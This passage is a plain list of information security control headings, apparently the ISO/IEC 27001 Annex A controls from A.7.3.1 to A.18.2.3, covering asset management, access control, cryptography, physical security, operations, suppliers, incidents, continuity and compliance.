A.7.3.1 Termination or change of employment responsibilities
A.8.1 Responsibility for assets
A.8.1.1 Inventory of assets
A.8.1.2 Ownership of assets
A.8.1.3 Acceptable use of assets
A.8.1.4 Return of assets
A.8.2 Information classification
A.8.2.1 Classification of information
A.8.2.2 Labelling of information
A.8.2.3 Handling of assets
A.8.3 Media handling
A.8.3.1 Management of removable media
A.8.3.2 Disposal of media
A.8.3.3 Physical media transfer
A.9.1 Business requirements of access control
A.9.1.1 Access control policy
A.9.1.2 Access to networks and network services
A.9.2 User access management
A.9.2.1 User registration and de-registration
A.9.2.2 User access provisioning
A.9.2.3 Management of privileged access rights
A.9.2.4 Management of secret authentication information of users
A.9.2.5 Review of user access rights
A.9.2.6 Removal or adjustment of access rights
A.9.3 User responsibilities
A.9.3.1 Use of secret authentication information
A.9.4 System and application access control
A.9.4.1 Information access restriction
A.9.4.2 Secure log-on procedures
A.9.4.3 Password management system
A.9.4.4 Use of privileged utility programs
A.9.4.5 Access control to program source code
A.10.1 Cryptographic controls
A.10.1.1 Policy on the use of cryptographic controls
A.10.1.2 Key management
A.11.1 Secure areas
A.11.1.1 Physical security perimeter
A.11.1.2 Physical entry controls
A.11.1.3 Securing offices, rooms and facilities
A.11.1.4 Protecting against external and environmental threats
A.11.1.5 Working in secure areas
A.11.1.6 Delivery and loading areas
A.11.2 Equipment
A.11.2.1 Equipment siting and protection
A.11.2.2 Supporting utilities
A.11.2.3 Cabling security
A.11.2.4 Equipment maintenance
A.11.2.5 Removal of assets
A.11.2.6 Security of equipment and assets off-premises
A.11.2.7 Secure disposal or re-use of equipment
A.11.2.8 Unattended user equipment
A.11.2.9 Clear desk and clear screen policy
A.12.1 Operational procedures and responsibilities
A.12.1.1 Documented operating procedures
A.12.1.2 Change management
A.12.1.3 Capacity management
A.12.1.4 Separation of development, testing and operational environments
A.12.2 Protection from malware
A.12.2.1 Controls against malware
A.12.3 Backup
A.12.3.1 Information backup
A.12.4 Logging and monitoring
A.12.4.1 Event logging
A.12.4.2 Protection of log information
A.12.4.3 Administrator and operator logs
A.12.4.4 Clock synchronisation
A.12.5 Control of operational software
A.12.5.1 Installation of software on operational systems
A.12.6 Technical vulnerability management
A.12.6.1 Management of technical vulnerabilities
A.12.6.2 Restrictions on software installation
A.12.7 Information systems audit considerations
A.12.7.1 Information systems audit controls
A.13.1 Network security management
A.13.1.1 Network controls
A.13.1.2 Security of network services
A.13.1.3 Segregation in networks
A.13.2 Information transfer
A.13.2.1 Information transfer policies and procedures
A.13.2.2 Agreements on information transfer
A.13.2.3 Electronic messaging
A.13.2.4 Confidentiality or non-disclosure agreements
A.14.1 Security requirements of information systems
A.14.1.1 Information security requirements analysis and specification
A.14.1.2 Securing application services on public networks
A.14.1.3 Protecting application services transactions
A.14.2 Security in development and support processes
A.14.2.1 Secure development policy
A.14.2.2 System change control procedures
A.14.2.3 Technical review of applications after operating platform changes
A.14.2.4 Restrictions on changes to software packages
A.14.2.5 Secure system engineering principles
A.14.2.6 Secure development environment
A.14.2.7 Outsourced development
A.14.2.8 System security testing
A.14.2.9 System acceptance testing
A.14.3 Test data
A.14.3.1 Protection of test data
A.15.1 Information security in supplier relationships
A.15.1.1 Information security policy for supplier relationships
A.15.1.2 Addressing security within supplier agreements
A.15.1.3 Information and communication technology supply chain
A.15.2 Supplier service delivery management
A.15.2.1 Monitoring and review of supplier services
A.15.2.2 Managing changes to supplier services
A.16.1 Management of information security incidents and improvements
A.16.1.1 Responsibilities and procedures
A.16.1.2 Reporting information security events
A.16.1.3 Reporting information security weaknesses
A.16.1.4 Assessment of and decision on information security events
A.16.1.5 Response to information security incidents
A.16.1.6 Learning from information security incidents
A.16.1.7 Collection of evidence
A.17.1 Information security continuity
A.17.1.1 Planning information security continuity
A.17.1.2 Implementing information security continuity
A.17.1.3 Verify, review and evaluate information security continuity
A.17.2 Redundancies
A.17.2.1 Availability of information processing facilities
A.18.1 Compliance with legal and contractual requirements
A.18.1.1 Identification of applicable legislation and contractual requirements
A.18.1.2 Intellectual property rights (IPR)
A.18.1.3 Protection of records
A.18.1.4 Privacy and protection of personally identifiable information
A.18.1.5 Regulation of cryptographic controls
A.18.2 Information security reviews
A.18.2.1 Independent review of information security
A.18.2.2 Compliance with security policies and standards
A.18.2.3 Technical compliance review